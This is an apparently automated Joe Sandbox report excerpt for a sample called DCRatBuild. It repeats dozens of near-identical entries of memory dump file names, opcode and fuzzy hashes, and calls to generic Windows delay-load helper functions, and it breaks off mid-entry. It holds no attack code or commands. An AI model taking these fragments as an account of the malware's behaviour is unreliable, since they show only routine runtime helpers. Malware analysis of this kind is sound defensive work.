                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: c6108d8e92e5b6a225408aa982cc263fddddfec1021ee0466bccda21d89af344
                                        • Instruction ID: 4d437ce2599d2747ed57c8b1b83e810d8250de3ee3e6076c42dc820b530da177
                                        • Opcode Fuzzy Hash: c6108d8e92e5b6a225408aa982cc263fddddfec1021ee0466bccda21d89af344
                                        • Instruction Fuzzy Hash: 0CB012D13AC101BC326871087C16D36020CC4C3B10331816BB48AD41C2D74C6CCE0871
                                        Function 0074D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 331a7085af5db20c956ecafcc57549dbd31f8f8083555c0d9901dac24f898795
                                        • Instruction ID: ac33ec6075991f9cbd3fe5000b29ec361ed7c07b4f7ccc1b43190ab9be2634ac
                                        • Opcode Fuzzy Hash: 331a7085af5db20c956ecafcc57549dbd31f8f8083555c0d9901dac24f898795
                                        • Instruction Fuzzy Hash: 17B012D13AC001BC322C71087D16D36020CC4C3B10330806AB48AD41C2D74C6D4F0831
                                        Function 0074D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9d758a8cc0baa8ab0c7a9992107e87fe1706ea2460d8c619348b78f9035fa120
                                        • Instruction ID: 5a20d6a3572e1aee69f121b50438e27c288ee92a4b2d30aeee9e8c924248d68d
                                        • Opcode Fuzzy Hash: 9d758a8cc0baa8ab0c7a9992107e87fe1706ea2460d8c619348b78f9035fa120
                                        • Instruction Fuzzy Hash: ABB012D13AC001BC322871087C16D36020CC4C3B10330C06AB88AD41C2D74C6C4E0831
                                        Function 0074D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 383910463fbb6fccc1b408915d739ca03be777348d5d34c6d93054bcf54633f0
                                        • Instruction ID: 1f1677a2dbf82f0e7b607df5d0f8e58b458aba88c6f8bbe752c2eecc0c664aa9
                                        • Opcode Fuzzy Hash: 383910463fbb6fccc1b408915d739ca03be777348d5d34c6d93054bcf54633f0
                                        • Instruction Fuzzy Hash: D5B012D53AD505BC322871047C56D3B020CD4C3B10330402AB48AD40C2D74C6C490931
                                        Function 0074D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: d4482c987743c9c4031ea1bbcff3f2c7ed79d2f4330a49410e87fec7579d1d7b
                                        • Instruction ID: faa59db08ed162b281c9c558fe423605f435e514f7621838f99ec5e9de20a7bb
                                        • Opcode Fuzzy Hash: d4482c987743c9c4031ea1bbcff3f2c7ed79d2f4330a49410e87fec7579d1d7b
                                        • Instruction Fuzzy Hash: FDB012D53AC701BC362831007C66C3B020CC4C3B10331457BB48AE40C2D74C6C8D4871
                                        Function 0074D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 3f49e095a75a92692691d35e0bc557a816dad305684477735bd8c07b82ee8bcc
                                        • Instruction ID: 763327a39cb32a0f659802fea9b6c8adca5f0e713c64aec96c5015a81206631d
                                        • Opcode Fuzzy Hash: 3f49e095a75a92692691d35e0bc557a816dad305684477735bd8c07b82ee8bcc
                                        • Instruction Fuzzy Hash: 43B012E13AC001FC322C71047D16D36028CC4C3B10730402AB48AD40C2D74C6D4E0831
                                        Function 0074D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 72957ab0817839e0dde5e3bd66df9db2ce69980f62d07e1ad69271a64baa729f
                                        • Instruction ID: 62ee434211ceb81abb5f7455784c1fc66fe52d76fa61c5b279d5ce9832a02f2b
                                        • Opcode Fuzzy Hash: 72957ab0817839e0dde5e3bd66df9db2ce69980f62d07e1ad69271a64baa729f
                                        • Instruction Fuzzy Hash: 20B012D13BE001BC322871047C16D3A024EC8C3B10730402AB48AD40C2D74C6C490831
                                        Function 0074D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: cda1c98667033a40766e5c132f55ba6eb5326423fc0d0f5539f00d2f35ec5e06
                                        • Instruction ID: 6a3cfb9fe30ab7620bc5ab71c64f8caff386377f7b07b98e8a8038b493e6057c
                                        • Opcode Fuzzy Hash: cda1c98667033a40766e5c132f55ba6eb5326423fc0d0f5539f00d2f35ec5e06
                                        • Instruction Fuzzy Hash: 4AB012D13AC001FC322871147C16D36024CC4C3B10331802AB98AD40C2D74C6C490831
                                        Function 0074D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9ebe89c4db43a1529c0aec8eb39461dfb84ea3833d92bd137542a0eb5202b455
                                        • Instruction ID: e96bdc80d9ef688d7306bdfcadc07a611f676e6e1beddcd0b2c3d4bb76ec0d39
                                        • Opcode Fuzzy Hash: 9ebe89c4db43a1529c0aec8eb39461dfb84ea3833d92bd137542a0eb5202b455
                                        • Instruction Fuzzy Hash: C7B012E13AD101BC326872047C16D36020EC4C3B10731412BB48AD40C2D74C6C890871
                                        Function 0074D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: a446e82309eef47d302c4cabcad871478f34c1c42d14f224ac0d9869ac85e999
                                        • Instruction ID: 9caa1aaf9b3d54a2131521e9ddb4d35ac7dec2806e0f104585a066cf235207a7
                                        • Opcode Fuzzy Hash: a446e82309eef47d302c4cabcad871478f34c1c42d14f224ac0d9869ac85e999
                                        • Instruction Fuzzy Hash: A8B012D13AD001BC322871047C16D36020EC4C3B10730802AB88AD40C2D74C6C490831
                                        Function 0074DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: bb53fa60482f14ce232c9f9a6a5a605beb5fc1a4b3d2cb6f24191a4628dc29bb
                                        • Instruction ID: 78e103e77caddf333d2454393f1e06c275fdec99cbab8c1d917d598445e2fc85
                                        • Opcode Fuzzy Hash: bb53fa60482f14ce232c9f9a6a5a605beb5fc1a4b3d2cb6f24191a4628dc29bb
                                        • Instruction Fuzzy Hash: 50B012D136D001BC322C714A7C16E3E024CC0C6B10330C52BB44AC4146D74C4C4F4431
                                        Function 0074DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f37bb151dda0b7ac23c9e73a8dd36e21b4cb423b3fc3421dd3f1bf495793de39
                                        • Instruction ID: 4e2e80a0d3f9ae21fca627d25d7093516ee73771ba4e9fb6c87eb2c1e7146c73
                                        • Opcode Fuzzy Hash: f37bb151dda0b7ac23c9e73a8dd36e21b4cb423b3fc3421dd3f1bf495793de39
                                        • Instruction Fuzzy Hash: 42B012E136C001FC322C71497C16D3A024CC0C1B10330C12BB84AC4146E74C4D4A4431
                                        Function 0074DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 43ea931a52dd6af8a03877f9eb9ea55ee8a665478cd28d05c43df362faa3bf9d
                                        • Instruction ID: 612ecec322b2b09effd5b24a49add938b64ec549087b367f755342921cdd523c
                                        • Opcode Fuzzy Hash: 43ea931a52dd6af8a03877f9eb9ea55ee8a665478cd28d05c43df362faa3bf9d
                                        • Instruction Fuzzy Hash: 8CB012D13AD101BC722C71497C16E3A024CD0C1B10330822BB44AC414AD74C4C4A4531
                                        Function 0074DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9ee3f197276be9d231233ee727bebb846e545404c5fec646205f22bf9b28df7a
                                        • Instruction ID: 0fdb901e62f62af4cc388b27f47b71e95f696bb16b7cffbe9e8359f7708d3a60
                                        • Opcode Fuzzy Hash: 9ee3f197276be9d231233ee727bebb846e545404c5fec646205f22bf9b28df7a
                                        • Instruction Fuzzy Hash: 6CB012E536C002BC322C61183D1BD37021CC0C1F10331802FB54AC0042DF4E4C4E9031
                                        Function 0074DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5f4a9479b9120e2fb80256cace945faadb414dc574f1e5fe0aae032e3ef718e7
                                        • Instruction ID: cdd6ea312d0a3dad4b4110bafdcda1df746d4f46a986d311d1cf6364fb22dea3
                                        • Opcode Fuzzy Hash: 5f4a9479b9120e2fb80256cace945faadb414dc574f1e5fe0aae032e3ef718e7
                                        • Instruction Fuzzy Hash: CBB012E536C002FC322C61183C1BD37022CC0C1F10331802FB84AC1042DF4D4C4D9031
                                        Function 0074DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
